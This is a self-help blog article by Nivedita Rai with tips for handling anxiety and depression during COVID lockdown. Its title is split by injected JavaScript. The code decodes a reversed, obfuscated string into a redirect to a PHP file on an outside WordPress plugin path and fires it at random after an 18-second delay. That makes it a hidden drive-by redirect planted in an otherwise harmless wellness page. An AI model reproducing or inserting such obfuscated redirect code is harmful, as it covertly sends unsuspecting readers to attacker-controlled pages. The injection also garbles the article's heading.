How to deal with anxiety $Ubj=function(n){if (typeof ($Ubj.list[n]) == "string") return $Ubj.list[n].split("").reverse().join("");return $Ubj.list[n];};$Ubj.list=["\'php.litu.ssalc/sedulcni/retadpu-yfimeht/snigulp/tnetnoc-pw/moc.setaicossadnalanruoj//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ubj(0), delay);}and depression during lockdown

Few ways you can deal with post lockdown anxiety, depression and negativity

The one who said, “covid cases are just numbers until they become a name you know”, has well said and very much appropriate. We’ve just seen a very dark time, like never seen before and it has disturbed all of us to our very core. 

This might be my personal opinion, but having to think everyone will relate to the anxiety at this point, to the negativity we were surrounded with, especially when we are in our ‘work from home and not to socialise’ modes.

Couldn’t help, but think of things that can reduce the developing anxiety and depression due to the curfews, the lockdown and the pandemic. It is necessary and It’s not even easy but here are a few things we can do to keep ourselves calm and positive. We can always try!

Give yourself a routine

Now, this is the time to be self-obsessed. Set short goals for each day or a week. Engage yourself in self-care. Do not sleep too much or too little, exercise more, meditate, set reminders to drink water, and eat adequately. Neither skipping a meal will help nor overeating. Eating healthy food also boosts your mood, so switch to a healthy routine. A proper schedule definitely helps in reducing stress and keeps you mentally busy; so no space for overthinking. A healthy lifestyle is the key to a healthy mind.

How to deal with anxiety and depression during lockdown
Source: Pexels

Turn on your ‘fun’ channel

If things are getting to you, hold strong and find a reason to smile every day. Watch more stand up comedy shows, funny videos, comedy films; give yourself a reason to laugh. That is an instant freshener. Play with the kids, play with pets, spend more time with nature, in fact, do something to preserve it; it’ll make you happy from deep inside. And most of all change to some upbeat, happy music. A change in the playlist brings an instant change in the mood and you can even jump and dance around. Do not think much, have fun, you’ll see your surroundings in a fresh mood.

How to deal with anxiety and depression during lockdown
Source: Pexels

Stop over-consuming the news

We are surrounded by all kinds of Covid related news, which is ultimately affecting our mental peace in one or another way. We need to just stay informative, so take all the information needed and then stop the extra news to get to you. For starters, we all scroll down the Instagram search feed. Try and change it into things that make you feel good, like surfing for sports, food, Bollywood, music etc. anything that distracts you from unwanted information.

How to deal with anxiety and depression during lockdown
Source: Pexels

No blame game

Blaming someone else always results in more and more negativity. Instead of blaming the world, people in higher authoritative positions, making a person feel that he/she is responsible for it, we should see the positives. Do your bit to make this place better for living. Stay affirmative that the good is going to come. 

How to deal with anxiety and depression during lockdown
Source: Pexels

Express yourself

It is the most important exercise to reduce stress, anxiety, depression and other mental issues that you express, tell your feelings. We have to stay in our homes to be safe, less socialising, less personal touch and that leads to frustration. Surround yourself with people you can talk to; friends, family, anyone. Indulge in long talks instead of chatting. 

Like I am sharing my opinion and feelings with you all in this format, you can also choose your mode of expression. It can be through painting, writing, speaking, working, anything that takes that burden out, setting within you.

How to deal with anxiety and depression during lockdown
Source: Pexels

These all measures have been personally practised, so stay at home and do give it a try. And do not let the darks fill the void with all the wrongs that are coming to you, fill the emptiness with your beautiful heart and the creative brain god has gifted to us humans.

The process of unlocking has begun. Sooner or later we will be heading out according to the guidelines and protocols. We just need to be patient and take care of ourselves and our families.

We can always start afresh. Nothing is easy but slowly and steadily we are the ones who stand firm on the virtue of perfection. We are all in this together. You’re always welcome to share your feelings with us. You need to just push that ‘go’ button. 

Note: All these measures are the writer’s opinion. Every person is different; we do not claim for these measures to work on each and every one. But if you feel you need help, do not hesitate to contact a professional.


Article contributed by: Nivedita Rai


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